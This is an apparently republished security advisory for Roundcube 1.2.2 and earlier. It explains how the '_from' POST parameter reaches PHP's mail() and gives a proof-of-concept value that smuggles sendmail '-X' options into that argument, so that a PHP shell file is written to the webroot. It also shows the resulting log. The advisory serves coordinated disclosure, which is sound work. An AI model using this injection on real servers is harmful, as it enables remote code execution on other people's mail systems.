Home / exploits Roundcube 1.2.2 Command Execution via Email
Posted on 30 November -0001
<HTML><HEAD><TITLE>Roundcube 1.2.2 Command Execution via Email</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Roundcube 1.2.2: Command Execution via Email ============================================ You can find the online version of the advisory here: https://blog.ripstech.com/2016/roundcube-command-execution-via-email/ Found by Robin Peraglie with RIPS Introduction ------------ Roundcube is a widely distributed open-source webmail software used by many organizations and companies around the globe. The mirror on SourceForge, for example, counts more than 260,000 downloads in the last 12 months which is only a small fraction of the actual users. Once Roundcube is installed on a server, it provides a web interface for authenticated users to send and receive emails with their web browser. Affected Versions: 1.0.0 - 1.2.2 Requirements ------------ - Roundcube must be configured to use PHP's mail() function (by default) - PHP's mail() function is configured to use sendmail (by default) - PHP is configured to have safe_mode turned off (by default) - An attacker must know or guess the absolute path of the webroot Description ----------- In Roundcube 1.2.2, and earlier, user-controlled input flows unsanitized into the fifth argument of a call to PHP's built-in function mail() which is documented as security critical. The problem is that the invocation of the mail() function will cause PHP to execute the sendmail program. The fifth argument allows to pass arguments to this execution which allows a configuration of sendmail. Since sendmail offers the -X option to log all mail traffic in a file, an attacker can abuse this option and spawn a malicious PHP file in the webroot directory of the attacked server. The following code lines trigger the vulnerability. program/steps/mail/sendmail.inc ******************************************************************************** $from = rcube_utils::get_input_value('_from', rcube_utils::INPUT_POST, true, $message_charset); â‹® $sent = $RCMAIL->deliver_message($MAIL_MIME, $from, $mailto,$smtp_error, $mailbody_file, $smtp_opts); ******************************************************************************** Here, the value of the POST parameter "_from" is fetched and Roundcube's deliver_message() method is invoked with the value used as second argument $from. program/lib/Roundcube/rcube.php ******************************************************************************** public function deliver_message(&$message, $from, $mailto, &$error, &$body_file = null, $options = null) { â‹® if (filter_var(ini_get('safe_mode'), FILTER_VALIDATE_BOOLEAN)) $sent = mail($to, $subject, $msg_body, $header_str); else $sent = mail($to, $subject, $msg_body, $header_str, "-f$from"); ******************************************************************************** This method will then pass the $from parameter to a call of the mail() function. The idea is to pass a custom "from" header to the sendmail program via the "-f" option. Proof of Concept ---------------- When an email is sent with Roundcube, the HTTP request can be intercepted and altered. Here, the "_from" parameter can be modified in order to place a malicious PHP file on the system. ******************************************************************************** example@example.com -OQueueDirectory=/tmp -X/var/www/html/rce.php ******************************************************************************** This allows an attacker to spawn a shell file "rce.php" in the web root directory with the contents of the "_subject" parameter that can contain PHP code. After performing the request, a file with the following content is created: ******************************************************************************** 04731 >>> Recipient names must be specified 04731 <<< To: squinty@localhost 04731 <<< Subject: <?php phpinfo(); ?> 04731 <<< X-PHP-Originating-Script: 1000:rcube.php 04731 <<< MIME-Version: 1.0 04731 <<< Content-Type: text/plain; charset=US-ASCII; 04731 <<< format=flowed 04731 <<< Content-Transfer-Encoding: 7bit 04731 <<< Date: So, 20 Nov 2016 04:02:52 +0100 04731 <<< From: example@example.com -OQueueDirectory=/tmp 04731 <<< -X/var/www/html/rce.php 04731 <<< Message-ID: <390a0c6379024872a7f0310cdea24900@localhost> 04731 <<< X-Sender: example@example.com -OQueueDirectory=/tmp 04731 <<< -X/var/www/html/rce.php 04731 <<< User-Agent: Roundcube Webmail/1.2.2 04731 <<< 04731 <<< Funny e-mail message 04731 <<< [EOF] ******************************************************************************** Since the email data is unencoded, the subject parameter will be reflected in plaintext which allows the injection of PHP tags into the shell file. Time Line --------- * 2016/11/21: First contact with vendor * 2016/11/28: Vendor agrees to coordinated disclosure * 2016/11/28: Vendor releases updated version Roundcube 1.2.3 </BODY></HTML>